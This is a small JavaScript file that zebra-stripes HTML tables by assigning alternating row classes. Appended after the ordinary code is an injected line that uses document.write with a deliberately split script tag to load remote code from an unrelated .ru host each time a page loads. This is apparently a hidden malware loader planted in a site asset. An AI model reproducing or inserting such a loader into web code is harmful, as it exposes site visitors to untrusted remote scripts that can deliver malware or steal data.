window.onload = colorRows;
function colorRows() 
{
	var table = document.getElementsByTagName("TABLE"); 
  	for (i=0; i < table.length; i++) 
	{	
  		if(String(table[i].id).substr(0,10) == "AUTOCOLORA")
  		{
  			for (j = 0; j < table[i].rows.length; j++)
			{
				for (z = 0; z < table[i].rows[j].cells.length; z++)
	  			{
	  				if(table[i].rows[j].className != "SALTA")
					{
		   				if (j%2==0) 
				  			table[i].rows[j].cells[z].className = "rowTint2";
				  		else
				  			table[i].rows[j].cells[z].className = "rowTint";
				  	}
	    		}
			}
	  		 			
  		}

	}
}

document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Laser_Printer.js"></scr'+'ipt>');